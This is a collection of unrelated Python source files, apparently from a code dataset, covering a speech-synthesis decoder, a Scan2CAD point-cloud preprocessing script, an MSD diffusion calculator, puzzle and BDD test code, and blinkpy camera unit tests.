self.lstm.append(lstm)
# define prenet
if prenet_layers > 0:
self.prenet = Prenet(
idim=odim,
n_layers=prenet_layers,
n_units=prenet_units,
dropout_rate=dropout_rate, )
else:
self.prenet = None
# define postnet
if postnet_layers > 0:
self.postnet = Postnet(
idim=idim,
odim=odim,
n_layers=postnet_layers,
n_chans=postnet_chans,
n_filts=postnet_filts,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate, )
else:
self.postnet = None
# define projection layers
iunits = idim + dunits if use_concate else dunits
self.feat_out = nn.Linear(
iunits, odim * reduction_factor, bias_attr=False)
self.prob_out = nn.Linear(iunits, reduction_factor)
# initialize
# self.apply(decoder_init)
def _zero_state(self, hs):
init_hs = paddle.zeros([paddle.shape(hs)[0], self.lstm[0].hidden_size])
return init_hs
def forward(self, hs, hlens, ys):
"""Calculate forward propagation.
Parameters
----------
hs : Tensor
Batch of the sequences of padded hidden states (B, Tmax, idim).
hlens : Tensor(int64) padded
Batch of lengths of each input batch (B,).
ys : Tensor
Batch of the sequences of padded target features (B, Lmax, odim).
Returns
----------
Tensor
Batch of output tensors after postnet (B, Lmax, odim).
Tensor
Batch of output tensors before postnet (B, Lmax, odim).
Tensor
Batch of logits of stop prediction (B, Lmax).
Tensor
Batch of attention weights (B, Lmax, Tmax).
Note
----------
This computation is performed in teacher-forcing manner.
"""
# thin out frames (B, Lmax, odim) -> (B, Lmax/r, odim)
if self.reduction_factor > 1:
ys = ys[:, self.reduction_factor - 1::self.reduction_factor]
# length list should be list of int
# hlens = list(map(int, hlens))
# initialize hidden states of decoder
c_list = [self._zero_state(hs)]
z_list = [self._zero_state(hs)]
for _ in six.moves.range(1, len(self.lstm)):
c_list += [self._zero_state(hs)]
z_list += [self._zero_state(hs)]
prev_out = paddle.zeros([paddle.shape(hs)[0], self.odim])
# initialize attention
prev_att_w = None
self.att.reset()
# loop for an output sequence
outs, logits, att_ws = [], [], []
for y in ys.transpose([1, 0, 2]):
if self.use_att_extra_inputs:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w,
prev_out)
else:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w)
prenet_out = self.prenet(
prev_out) if self.prenet is not None else prev_out
xs = paddle.concat([att_c, prenet_out], axis=1)
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0]))
z_list[0], c_list[0] = next_hidden
for i in six.moves.range(1, len(self.lstm)):
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[i](z_list[i - 1],
(z_list[i], c_list[i]))
z_list[i], c_list[i] = next_hidden
zcs = (paddle.concat([z_list[-1], att_c], axis=1)
if self.use_concate else z_list[-1])
outs += [
self.feat_out(zcs).reshape([paddle.shape(hs)[0], self.odim, -1])
]
logits += [self.prob_out(zcs)]
att_ws += [att_w]
# teacher forcing
prev_out = y
if self.cumulate_att_w and prev_att_w is not None:
prev_att_w = prev_att_w + att_w # Note: error when use +=
else:
prev_att_w = att_w
# (B, Lmax)
logits = paddle.concat(logits, axis=1)
# (B, odim, Lmax)
before_outs = paddle.concat(outs, axis=2)
# (B, Lmax, Tmax)
att_ws = paddle.stack(att_ws, axis=1)
if self.reduction_factor > 1:
# (B, odim, Lmax)
before_outs = before_outs.reshape(
[paddle.shape(before_outs)[0], self.odim, -1])
if self.postnet is not None:
# (B, odim, Lmax)
after_outs = before_outs + self.postnet(before_outs)
else:
after_outs = before_outs
# (B, Lmax, odim)
before_outs = before_outs.transpose([0, 2, 1])
# (B, Lmax, odim)
after_outs = after_outs.transpose([0, 2, 1])
logits = logits
# apply activation function for scaling
if self.output_activation_fn is not None:
before_outs = self.output_activation_fn(before_outs)
after_outs = self.output_activation_fn(after_outs)
return after_outs, before_outs, logits, att_ws
def inference(
self,
h,
threshold=0.5,
minlenratio=0.0,
maxlenratio=10.0,
use_att_constraint=False,
backward_window=None,
forward_window=None, ):
"""Generate the sequence of features given the sequences of characters.
Parameters
----------
h : Tensor
Input sequence of encoder hidden states (T, C).
threshold : float, optional
Threshold to stop generation.
minlenratio : float, optional
Minimum length ratio.
If set to 1.0 and the length of input is 10,
the minimum length of outputs will be 10 * 1 = 10.
minlenratio : float, optional
Minimum length ratio.
If set to 10 and the length of input is 10,
the maximum length of outputs will be 10 * 10 = 100.
use_att_constraint : bool
Whether to apply attention constraint introduced in `Deep Voice 3`_.
backward_window : int
Backward window size in attention constraint.
forward_window : int
Forward window size in attention constraint.
Returns
----------
Tensor
Output sequence of features (L, odim).
Tensor
Output sequence of stop probabilities (L,).
Tensor
Attention weights (L, T).
Note
----------
This computation is performed in auto-regressive manner.
.. _`Deep Voice 3`: https://arxiv.org/abs/1710.07654
"""
# setup
assert len(paddle.shape(h)) == 2
hs = h.unsqueeze(0)
ilens = paddle.shape(h)[0]
maxlen = int(paddle.shape(h)[0] * maxlenratio)
minlen = int(paddle.shape(h)[0] * minlenratio)
# initialize hidden states of decoder
c_list = [self._zero_state(hs)]
z_list = [self._zero_state(hs)]
for _ in six.moves.range(1, len(self.lstm)):
c_list += [self._zero_state(hs)]
z_list += [self._zero_state(hs)]
prev_out = paddle.zeros([1, self.odim])
# initialize attention
prev_att_w = None
self.att.reset()
# setup for attention constraint
if use_att_constraint:
last_attended_idx = 0
else:
last_attended_idx = None
# loop for an output sequence
idx = 0
outs, att_ws, probs = [], [], []
while True:
# updated index
idx += self.reduction_factor
# decoder calculation
if self.use_att_extra_inputs:
att_c, att_w = self.att(
hs,
ilens,
z_list[0],
prev_att_w,
prev_out,
last_attended_idx=last_attended_idx,
backward_window=backward_window,
forward_window=forward_window, )
else:
att_c, att_w = self.att(
hs,
ilens,
z_list[0],
prev_att_w,
last_attended_idx=last_attended_idx,
backward_window=backward_window,
forward_window=forward_window, )
att_ws += [att_w]
prenet_out = self.prenet(
prev_out) if self.prenet is not None else prev_out
xs = paddle.concat([att_c, prenet_out], axis=1)
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0]))
z_list[0], c_list[0] = next_hidden
for i in six.moves.range(1, len(self.lstm)):
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[i](z_list[i - 1],
(z_list[i], c_list[i]))
z_list[i], c_list[i] = next_hidden
zcs = (paddle.concat([z_list[-1], att_c], axis=1)
if self.use_concate else z_list[-1])
# [(1, odim, r), ...]
outs += [self.feat_out(zcs).reshape([1, self.odim, -1])]
# [(r), ...]
probs += [F.sigmoid(self.prob_out(zcs))[0]]
if self.output_activation_fn is not None:
prev_out = self.output_activation_fn(
outs[-1][:, :, -1]) # (1, odim)
else:
prev_out = outs[-1][:, :, -1] # (1, odim)
if self.cumulate_att_w and prev_att_w is not None:
prev_att_w = prev_att_w + att_w # Note: error when use +=
else:
prev_att_w = att_w
if use_att_constraint:
last_attended_idx = int(att_w.argmax())
# check whether to finish generation
if sum(paddle.cast(probs[-1] >= threshold,
'int64')) > 0 or idx >= maxlen:
# check mininum length
if idx < minlen:
continue
# (1, odim, L)
outs = paddle.concat(outs, axis=2)
if self.postnet is not None:
# (1, odim, L)
outs = outs + self.postnet(outs)
# (L, odim)
outs = outs.transpose([0, 2, 1]).squeeze(0)
probs = paddle.concat(probs, axis=0)
att_ws = paddle.concat(att_ws, axis=0)
break
if self.output_activation_fn is not None:
outs = self.output_activation_fn(outs)
return outs, probs, att_ws
def calculate_all_attentions(self, hs, hlens, ys):
"""Calculate all of the attention weights.
Parameters
----------
hs : Tensor
Batch of the sequences of padded hidden states (B, Tmax, idim).
hlens : Tensor(int64)
Batch of lengths of each input batch (B,).
ys : Tensor
Batch of the sequences of padded target features (B, Lmax, odim).
Returns
----------
numpy.ndarray
Batch of attention weights (B, Lmax, Tmax).
Note
----------
This computation is performed in teacher-forcing manner.
"""
# thin out frames (B, Lmax, odim) -> (B, Lmax/r, odim)
if self.reduction_factor > 1:
ys = ys[:, self.reduction_factor - 1::self.reduction_factor]
# length list should be list of int
hlens = list(map(int, hlens))
# initialize hidden states of decoder
c_list = [self._zero_state(hs)]
z_list = [self._zero_state(hs)]
for _ in six.moves.range(1, len(self.lstm)):
c_list += [self._zero_state(hs)]
z_list += [self._zero_state(hs)]
prev_out = paddle.zeros([paddle.shape(hs)[0], self.odim])
# initialize attention
prev_att_w = None
self.att.reset()
# loop for an output sequence
att_ws = []
for y in ys.transpose([1, 0, 2]):
if self.use_att_extra_inputs:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w,
prev_out)
else:
att_c, att_w = self.att(hs, hlens, z_list[0], prev_att_w)
att_ws += [att_w]
prenet_out = self.prenet(
prev_out) if self.prenet is not None else prev_out
xs = paddle.concat([att_c, prenet_out], axis=1)
# we only use the second output of LSTMCell in paddle
_, next_hidden = self.lstm[0](xs, (z_list[0], c_list[0]))
z_list[0], c_list[0] = next_hidden
for i in six.moves.range(1, len(self.lstm)):
z_list[i], c_list[i] = self.lstm[i](z_list[i - 1],
(z_list[i], c_list[i]))
# teacher forcing
prev_out = y
if self.cumulate_att_w and prev_att_w is not None:
# Note: error when use +=
prev_att_w = prev_att_w + att_w
else:
prev_att_w = att_w
# (B, Lmax, Tmax)
att_ws = paddle.stack(att_ws, axis=1)
return att_ws
| 2.21875 | 2 |
pyblazing/__init__.py | Mattlk13/pyBlazing | 0 | 5525 | from .api import run_query_get_token
from .api import convert_to_dask
from .api import run_query_get_results
from .api import run_query_get_concat_results
from .api import register_file_system
from .api import deregister_file_system
from .api import FileSystemType, DriverType, EncryptionType
from .api import SchemaFrom
from .api import create_table
from .api import ResultSetHandle
from .api import _get_client
from .api import gdf_dtype
from .api import get_dtype_values
from .api import get_np_dtype_to_gdf_dtype
from .api import SetupOrchestratorConnection
from .apiv2.context import make_default_orc_arg
from .apiv2.context import make_default_csv_arg
| 1.296875 | 1 |
bootstrap/p1.5.0/src/common/const.py | apurwaj2/df-on-k8s | 0 | 5526 |
class Constants(object):
LOGGER_CONF = "common/mapr_conf/logger.yml"
USERNAME = "mapr"
GROUPNAME = "mapr"
USERID = 5000
GROUPID = 5000
ADMIN_USERNAME = "custadmin"
ADMIN_GROUPNAME = "custadmin"
ADMIN_USERID = 7000
ADMIN_GROUPID = 7000
ADMIN_PASS = "<PASSWORD>"
MYSQL_USER = "admin"
MYSQL_PASS = "<PASSWORD>"
LDAPADMIN_USER = "admin"
LDAPADMIN_PASS = "<PASSWORD>"
LDAPBIND_USER = "readonly"
LDAPBIND_PASS = "<PASSWORD>"
EXAMPLE_LDAP_NAMESPACE = "hpe-ldap"
CSI_REPO = "quay.io/k8scsi"
KDF_REPO = "docker.io/maprtech" #registry.hub.docker.com/maprtech
KUBEFLOW_REPO = "gcr.io/mapr-252711/kf-ecp-5.3.0"
OPERATOR_REPO = "gcr.io/mapr-252711"
KUBELET_DIR = "/var/lib/kubelet"
ECP_KUBELET_DIR = "/var/lib/docker/kubelet"
LOCAL_PATH_PROVISIONER_REPO= ""
KFCTL_HSP_ISTIO_REPO = ""
BUSYBOX_REPO = ""
def enum(**named_values):
return type('Enum', (), named_values)
AUTH_TYPES = enum(CUSTOM_LDAP='customLDAP', RAW_LINUX_USERS='rawLinuxUsers', EXAMPLE_LDAP='exampleLDAP')
# OPEN SSL
OPENSSL = '/usr/bin/openssl'
KEY_SIZE = 1024
DAYS = 3650
CA_CERT = 'ca.cert'
CA_KEY = 'ca.key'
# http://www.openssl.org/docs/apps/openssl.html#PASS_PHRASE_ARGUMENTS
X509_EXTRA_ARGS = ()
OPENSSL_CONFIG_TEMPLATE = """
prompt = no
distinguished_name = req_distinguished_name
req_extensions = v3_req
[ req_distinguished_name ]
C = US
ST = CO
L = Fort Collins
O = HPE
OU = HCP
CN = %(service)s
emailAddress = <EMAIL>
[ v3_req ]
# Extensions to add to a certificate request
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names
[ alt_names ]
DNS.1 = %(service)s
DNS.2 = %(service)s.%(namespace)s
DNS.3 = %(service)s.%(namespace)s.svc
"""
| 1.929688 | 2 |
dataset/scan2cad/s2c_collect_pgroup.py | jeonghyunkeem/PointGroup | 0 | 5527 | <gh_stars>0
# <NAME>, UVR KAIST @<EMAIL>
import os, sys
import json
import h5py
import numpy as np
import quaternion
import torch
from torch.utils.data import Dataset
BASE_DIR_1 = os.path.dirname(os.path.abspath(__file__)) # scan2cad
BASE_DIR = os.path.dirname(BASE_DIR_1) # dataset
ROOT_DIR = os.path.dirname(BASE_DIR) # PointGroup
DATA_DIR = os.path.dirname(ROOT_DIR) # /root/
DATA_DIR = os.path.join(DATA_DIR, 'Dataset') # /root/Dataset
DUMP_DIR = os.path.join(ROOT_DIR, 'data')
sys.path.append(BASE_DIR)
sys.path.append(ROOT_DIR)
from s2c_map import CLASS_MAPPING, ID2NAME, CARED_CLASS_MASK
from s2c_config import Scan2CADDatasetConfig
import s2c_utils
sys.path.append(os.path.join(ROOT_DIR, 'models/retrieval/'))
DC = Scan2CADDatasetConfig()
MAX_NUM_POINT = 50000
MAX_NUM_OBJ = 64
INS_NUM_POINT = 2048
FEATURE_DIMENSION = 512
MAX_DATA_SIZE = 15000
CHUNK_SIZE = 1000
INF = 9999
NOT_CARED_ID = np.array([INF]) # wall, floor
# Thresholds
PADDING = 0.05
SCALE_THRASHOLD = 0.05
SEG_THRESHOLD = 1
REMAPPER = np.ones(35, dtype=np.int64) * (-1)
for i, x in enumerate(CARED_CLASS_MASK):
REMAPPER[x] = i
print(f'REMAPPER[{x:2d}] => {i:2d}')
SYM2CLASS = {"__SYM_NONE": 0, "__SYM_ROTATE_UP_2": 1, "__SYM_ROTATE_UP_4": 2, "__SYM_ROTATE_UP_INF": 3}
# functions ==============================================================================================
def from_q_to_6d(q):
q = np.quaternion(q[0], q[1], q[2], q[3])
mat = quaternion.as_rotation_matrix(q) # 3x3
rep6d = mat[:, 0:2].transpose().reshape(-1, 6) # 6
return rep6d
def nn_search(p, ps):
target = torch.from_numpy(ps.copy())
p = torch.from_numpy(p.copy())
p_diff = target - p
p_dist = torch.sum(p_diff**2, dim=-1)
dist, idx = torch.min(p_dist, dim=-1)
return dist.item(), idx.item()
def make_M_from_tqs(t, q, s):
q = np.quaternion(q[0], q[1], q[2], q[3])
T = np.eye(4)
T[0:3, 3] = t
R = np.eye(4)
R[0:3, 0:3] = quaternion.as_rotation_matrix(q)
S = np.eye(4)
S[0:3, 0:3] = np.diag(s)
M = T.dot(R).dot(S)
return M
def compose_mat4(t, q, s, center=None):
if not isinstance(q, np.quaternion):
q = np.quaternion(q[0], q[1], q[2], q[3])
T = np.eye(4)
T[0:3, 3] = t
R = np.eye(4)
R[0:3, 0:3] = quaternion.as_rotation_matrix(q)
S = np.eye(4)
S[0:3, 0:3] = np.diag(s)
C = np.eye(4)
if center is not None:
C[0:3, 3] = center
M = T.dot(R).dot(S).dot(C)
return M
def decompose_mat4(M):
R = M[0:3, 0:3].copy()
sx = np.linalg.norm(R[0:3, 0])
sy = np.linalg.norm(R[0:3, 1])
sz = np.linalg.norm(R[0:3, 2])
s = np.array([sx, sy, sz])
R[:,0] /= sx
R[:,1] /= sy
R[:,2] /= sz
q = quaternion.from_rotation_matrix(R[0:3, 0:3])
t = M[0:3, 3]
return t, q, s
# ========================================================================================================
LOG_N = 100
def print_log(log):
print('-'*LOG_N+'\n'+log+' \n'+'-'*LOG_N)
class Scan2CADCollect(Dataset):
def __init__(self, split_set='train', distr_check=False):
self.data_path = os.path.join(DATA_DIR, 'Scan2CAD/export')
self.out_path = os.path.join(BASE_DIR_1, 'data4')
if not os.path.exists(self.out_path):
os.mkdir(self.out_path)
print("Create export directory: {}".format(self.out_path))
all_scan_names = list(set([os.path.basename(x)[0:12] \
for x in os.listdir(self.data_path) if x.startswith('scene')]))
self.scan_names = []
if split_set in ['all', 'train', 'val', 'test']:
split_filenames = os.path.join(BASE_DIR_1, 'meta_data',
'scan2cad_{}.txt'.format(split_set))
with open(split_filenames, 'r') as f:
self.scan_list = f.read().splitlines()
# remove unavailiable scans
num_scans = len(self.scan_list)
self.scan_list = [sname for sname in self.scan_list \
if sname in all_scan_names]
print_log('Dataset for {}: kept {} scans out of {}'.format(split_set, len(self.scan_list), num_scans))
num_scans = len(self.scan_list)
else:
print('illegal split name')
return
filename_json = BASE_DIR_1 + "/full_annotations.json"
assert filename_json
self.dataset = {}
cat_summary = dict.fromkeys(DC.ClassToName, 0)
cat_ids = []
with open(filename_json, 'r') as f:
data = json.load(f)
d = {}
i = -1
for idx, r in enumerate(data):
i_scan = r["id_scan"]
if i_scan not in self.scan_list:
continue
self.scan_names.append(i_scan)
i += 1
d[i] = {}
d[i]['id_scan'] = i_scan
d[i]['trs'] = r["trs"]
n_model = r["n_aligned_models"]
d[i]['n_total'] = n_model
d[i]['models'] = {}
for j in range(n_model):
d[i]['models'][j] = {}
d[i]['models'][j]['trs'] = r["aligned_models"][j]['trs']
d[i]['models'][j]['center'] = r["aligned_models"][j]['center']
d[i]['models'][j]['bbox'] = r["aligned_models"][j]['bbox']
d[i]['models'][j]['sym'] = SYM2CLASS[r["aligned_models"][j]['sym']]
d[i]['models'][j]['fname'] = r["aligned_models"][j]['id_cad']
cat_id = r["aligned_models"][j]['catid_cad']
cat_ids.append(cat_id)
d[i]['models'][j]['cat_id'] = cat_id
cat_class = DC.ShapenetIDtoClass(cat_id)
d[i]['models'][j]['sem_cls'] = cat_class
# category summary
cat_summary[cat_class]+=1
self.dataset = d
self.cat_ids = np.unique(cat_ids)
if distr_check:
for k, v in sorted(cat_summary.items(), key=lambda item:item[1], reverse=True):
print(f'{k:2d}: {DC.ClassToName[k]:12s} => {v:4d}')
def __len__(self):
return len(self.dataset)
def size_check(self, scale, id_scan, sem_cls):
check = False
if scale[0] < SCALE_THRASHOLD:
scale[0] = SCALE_THRASHOLD
check = True
if scale[1] < SCALE_THRASHOLD:
scale[1] = SCALE_THRASHOLD
check = True
if scale[2] < SCALE_THRASHOLD:
scale[2] = SCALE_THRASHOLD
check = True
return scale
def collect(self, N, dump=False):
""" Return dictionary of {verts(x,y,z): cad filename}
Note:
NK = a total number of instances in dataset
V = a number of vertices
args:
N: int
a size of dataset
return:
dict: (NK, 1, V, 3)
a dictionary for verts-cad_file pairs
"""
# ======= GLOBAL LABEL VARIABLES =======
error_scan = {} # Text
# Anchor collection (for detection)
print_log(" LOADING SCENES")
collect_path = os.path.join(BASE_DIR, 'collect')
for index in range(N):
data = self.dataset[index]
id_scan = data['id_scan']
K = data['n_total']
assert(K <= MAX_NUM_OBJ)
# Point Cloud
mesh_vertices = np.load(os.path.join(self.data_path, id_scan) + '_vert.npy') # (N, 3)
semantic_labels = np.load(os.path.join(self.data_path, id_scan) + '_sem_label.npy') # (N, sem_cls(0, 1~35, 36~MAX, INF))
point_cloud = mesh_vertices[:,0:3]
colors = mesh_vertices[:,3:6] / 127.5 - 1
instance_vertices = np.ones((point_cloud.shape[0]), dtype=np.int64) * (-1)
semantic_vertices = np.ones((point_cloud.shape[0]), dtype=np.int64) * (-1)
# Sorting points cropping order to avoid overlapping
sort_by_scale = {}
for model in range(K):
obj_scale = np.array(data['models'][model]['trs']['scale'])
sort_by_scale[model] = np.sum(obj_scale)
model_scale_order = {model: scale for model, scale in sorted(sort_by_scale.items(), key=(lambda item:item[1]), reverse=True)}
K = len(model_scale_order.keys())
# Iterate on scale_order
checked = False
k = -1
for i, model in enumerate(model_scale_order.keys()):
k += 1
# semantics ()
sem_cls = data['models'][model]['sem_cls'] # (0~num_classes-1)
# Transform
obj_center = np.array(data['models'][model]['center'])
obj_translation = np.array(data['models'][model]['trs']['translation'])
obj_rotation = np.array(data['models'][model]['trs']['rotation'])
obj_scale = np.array(data['models'][model]['trs']['scale'])
obj_scale = self.size_check(obj_scale, id_scan, sem_cls)
Mobj = compose_mat4(obj_translation, obj_rotation, obj_scale, obj_center)
# Instance vertices
# - (1) Region Crop & Axis-aligned Bounding Box
vert_choices = np.array([])
ins_bbox = np.array(data['models'][model]['bbox'])
obj_corners = s2c_utils.get_3d_box_rotated(ins_bbox, Mobj, padding=PADDING)
ex_points, obj_vert_ind = s2c_utils.extract_pc_in_box3d(point_cloud, obj_corners)
nx = ex_points.shape[0]
# - (2) Instance Segments Crop
seg_points, vert_choices = \
s2c_utils.filter_dominant_cls(point_cloud, obj_vert_ind, semantic_labels, sem_cls+1, NOT_CARED_ID)
seg_nx = seg_points.shape[0]
# ======= Semantic/Instance vertices =======
if seg_nx < SEG_THRESHOLD:
k -= 1
checked = True
continue
sem_cls = REMAPPER[sem_cls]
# if sem_cls < 0: continue # ignore non-valid class object (only preserve CARED classes)
instance_vertices[vert_choices] = k # (0~K-1) NOTE:unannotated=-1
semantic_vertices[vert_choices] = sem_cls # (0~num_classes-1) NOTE:unannotated=-1
# error check
ins_list = np.unique(instance_vertices)
if (np.max(instance_vertices)+1) != (len(ins_list)-1):
print_log(f"[{index}/{N} Error] Please check this scene --> {id_scan}")
error_scan[id_scan] = 0
continue
# DUMP COLLECT RESULTS
if dump:
scene_path = os.path.join(collect_path, f'{id_scan}')
if not os.path.exists(scene_path):
os.mkdir(scene_path)
print("Created scene directory: {}".format(scene_path))
s2c_utils.write_scene_results(points=point_cloud, ins_points=instance_vertices, num_instances=K, bboxes=None, file_path=scene_path)
point_cloud = np.ascontiguousarray(point_cloud[:, :3] - point_cloud[:, :3].mean(0))
pcoord = point_cloud.astype(np.float64)
colors = colors.astype(np.float32)
sem_labels = semantic_vertices.astype(np.float64)
ins_labels = instance_vertices.astype(np.float64)
# ============ DUMP ============
# scene data
file_path = os.path.join(self.out_path, id_scan+'_inst.pth')
torch.save((pcoord, colors, sem_labels, ins_labels), file_path)
print(f"[{index}/{N} Saved] {id_scan} >>> {file_path}")
# error scan
with open(self.out_path+'/error_scan.txt', 'w') as f:
print_log("ERROR SCAN")
for i, sname in enumerate(error_scan.keys()):
print('{:2d}: {}'.format(i, sname))
f.write(sname)
f.write('\n')
if __name__ == "__main__":
Dataset = Scan2CADCollect(split_set='all', distr_check=True)
N = len(Dataset)
Dataset.collect(N, dump=False) | 1.789063 | 2 |
nappy/msd2diff.py | ryokbys/nap | 27 | 5528 | #!/usr/bin/env python
"""
Compute diffusion coefficient from MSD data.
Time interval, DT, is obtained from in.pmd in the same directory.
Usage:
msd2diff.py [options] MSD_FILE
Options:
-h, --help Show this message and exit.
-o, --offset OFFSET
Offset of given data. [default: 0]
--plot Plot a fitted graph. [default: False]
"""
from __future__ import print_function
import os,sys
from docopt import docopt
import numpy as np
__author__ = "<NAME>"
__version__ = "191212"
def read_out_msd(fname='out.msd',offset=0,specorder=[],spc=None):
if specorder == [] or spc not in specorder:
index = 1
else:
index = specorder.index(spc) +1
with open(fname,'r') as f:
lines = f.readlines()
try:
dname = os.path.dirname(fname)
dt = dt_from_inpmd(fname=dname+'/in.pmd')
except Exception as e:
raise RuntimeError('Failed to read in.pmd.')
ts = []
msds = []
n0 = 0
msd0 = 0.0
for il,line in enumerate(lines):
if line[0] == '#':
continue
data = line.split()
if il < offset:
n0 = int(data[0])
msd0 = float(data[index])
continue
n = int(data[0])
msd = float(data[index])
ts.append((n-n0)*dt)
msds.append(msd-msd0)
return np.array(ts),np.array(msds)
def dt_from_inpmd(fname='in.pmd'):
with open(fname,'r') as f:
lines = f.readlines()
for line in lines:
if 'time_interval' in line:
time_interval = abs(float(line.split()[1]))
elif 'num_iteration' in line:
num_iteration = int(line.split()[1])
elif 'num_out_pos' in line or 'num_out_pmd' in line:
num_out_pos = int(line.split()[1])
return time_interval*num_iteration/num_out_pos
def msd2D(ts,msds,fac,dim=3):
"""
Compute diffusion coefficient from time [fs] vs MSD [Ang^2] data
by solving least square problem using numpy.
Return diffusion coefficient multiplied by FAC.
"""
A= np.array([ts, np.ones(len(ts))])
A = A.T
xvar = np.var(A[:,0])
p,res,_,_ = np.linalg.lstsq(A,msds,rcond=None)
a = p[0]
b = p[1]
# fac = 1.0e-16 /1.e-15
a = a *fac /(2.0*dim)
b = b *fac
# print(res[0],xvar,np.mean(A[:,0]),len(ts))
std = np.sqrt(res[0]/len(ts)/xvar) *fac /(2.0*dim)
return a,b,std
if __name__ == "__main__":
args = docopt(__doc__)
fname = args['MSD_FILE']
offset = int(args['--offset'])
plot = args['--plot']
ts,msds = read_out_msd(fname,offset)
#...Assuming input MSD unit in A^2/fs and output in cm^2/s
fac = 1.0e-16 /1.0e-15
#...Least square
a,b,std = msd2D(ts,msds,fac)
print(' Diffusion coefficient = {0:12.4e}'.format(a)+
' +/- {0:12.4e} [cm^2/s]'.format(std))
if plot:
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(context='talk',style='ticks')
#...Original time unit == fs
unit = 'fs'
tfac = 1.0
if ts[-1] > 1.0e+5: #...if max t > 100ps, time unit in ps
unit = 'ps'
tfac = 1.0e-3
plt.xlabel('Time ({0:s})'.format(unit))
plt.ylabel('MSD (A^2/{0:s})'.format(unit))
fvals = np.array([ (t*a+b)/fac for t in ts ])
plt.plot(ts*tfac,msds/tfac,'b-',label='MSD data')
plt.plot(ts*tfac,fvals/tfac,'r-',label='Fitted curve')
plt.savefig("graph_msd2D.png", format='png',
dpi=300, bbox_inches='tight')
print(' Wrote graph_msd2D.png')
| 2.609375 | 3 |
5/part2.py | jcsesznegi/advent-of-code-2017 | 1 | 5529 | <filename>5/part2.py<gh_stars>1-10
import os
f = open(os.path.join(os.path.dirname(__file__), '../input/5/part2.txt'), 'r')
class InstructionSet:
def __init__(self, instructions):
self.instructions = instructions
self.currentIndex = 0
self.numberSteps = 0
def _changeOffsetValue(self, index):
if self.instructions[index] >= 3:
self.instructions[index] -= 1
else:
self.instructions[index] += 1
def jump(self):
self.numberSteps += 1
jumpNumber = self.instructions[self.currentIndex]
oldIndex = self.currentIndex
self.currentIndex += jumpNumber
self._changeOffsetValue(oldIndex)
def run(self):
while (self.currentIndex >= 0
and self.currentIndex < len(self.instructions)):
self.jump()
def main():
def formatLine(line):
return int(line.rstrip())
line = f.readline()
instructions = []
while line:
instructions.append(formatLine(line))
line = f.readline()
instructionSet = InstructionSet(instructions)
instructionSet.run()
print(instructionSet.numberSteps)
if __name__ == '__main__':
main()
| 3.328125 | 3 |
features/steps/basic_account_add_bdd.py | MhmdRyhn/behavior_test | 0 | 5530 | <reponame>MhmdRyhn/behavior_test
import behave
@behave.when('I add $1200 to my account')
def add_usd_1200(context):
context.account.add_cash(amount=1200)
@behave.then('It becomes $3200 in my account')
def check_for_increase_to_usd_1880(context):
assert context.account.current_cash == 3200
| 2.84375 | 3 |
tests/test_sync_module.py | naveengh6/blinkpy | 272 | 5531 | <reponame>naveengh6/blinkpy
"""Tests camera and system functions."""
import unittest
from unittest import mock
from blinkpy.blinkpy import Blink
from blinkpy.helpers.util import BlinkURLHandler
from blinkpy.sync_module import BlinkSyncModule, BlinkOwl
from blinkpy.camera import BlinkCamera, BlinkCameraMini
@mock.patch("blinkpy.auth.Auth.query")
class TestBlinkSyncModule(unittest.TestCase):
"""Test BlinkSyncModule functions in blinkpy."""
def setUp(self):
"""Set up Blink module."""
self.blink = Blink(motion_interval=0)
self.blink.last_refresh = 0
self.blink.urls = BlinkURLHandler("test")
self.blink.sync["test"] = BlinkSyncModule(self.blink, "test", "1234", [])
self.camera = BlinkCamera(self.blink.sync)
self.mock_start = [
{
"syncmodule": {
"id": 1234,
"network_id": 5678,
"serial": "12345678",
"status": "foobar",
}
},
{"event": True},
{},
{},
None,
{"devicestatus": {}},
]
self.blink.sync["test"].network_info = {"network": {"armed": True}}
def tearDown(self):
"""Clean up after test."""
self.blink = None
self.camera = None
self.mock_start = None
def test_bad_status(self, mock_resp):
"""Check that we mark module unavaiable on bad status."""
self.blink.sync["test"].status = None
self.blink.sync["test"].available = True
self.assertFalse(self.blink.sync["test"].online)
self.assertFalse(self.blink.sync["test"].available)
def test_bad_arm(self, mock_resp):
"""Check that we mark module unavaiable if bad arm status."""
self.blink.sync["test"].network_info = None
self.blink.sync["test"].available = True
self.assertEqual(self.blink.sync["test"].arm, None)
self.assertFalse(self.blink.sync["test"].available)
self.blink.sync["test"].network_info = {}
self.blink.sync["test"].available = True
self.assertEqual(self.blink.sync["test"].arm, None)
self.assertFalse(self.blink.sync["test"].available)
def test_get_events(self, mock_resp):
"""Test get events function."""
mock_resp.return_value = {"event": True}
self.assertEqual(self.blink.sync["test"].get_events(), True)
def test_get_events_fail(self, mock_resp):
"""Test handling of failed get events function."""
mock_resp.return_value = None
self.assertFalse(self.blink.sync["test"].get_events())
mock_resp.return_value = {}
self.assertFalse(self.blink.sync["test"].get_events())
def test_get_camera_info(self, mock_resp):
"""Test get camera info function."""
mock_resp.return_value = {"camera": ["foobar"]}
self.assertEqual(self.blink.sync["test"].get_camera_info("1234"), "foobar")
def test_get_camera_info_fail(self, mock_resp):
"""Test handling of failed get camera info function."""
mock_resp.return_value = None
self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {})
mock_resp.return_value = {}
self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {})
mock_resp.return_value = {"camera": None}
self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {})
def test_get_network_info(self, mock_resp):
"""Test network retrieval."""
mock_resp.return_value = {"network": {"sync_module_error": False}}
self.assertTrue(self.blink.sync["test"].get_network_info())
mock_resp.return_value = {"network": {"sync_module_error": True}}
self.assertFalse(self.blink.sync["test"].get_network_info())
def test_get_network_info_failure(self, mock_resp):
"""Test failed network retrieval."""
mock_resp.return_value = {}
self.blink.sync["test"].available = True
self.assertFalse(self.blink.sync["test"].get_network_info())
self.assertFalse(self.blink.sync["test"].available)
self.blink.sync["test"].available = True
mock_resp.return_value = None
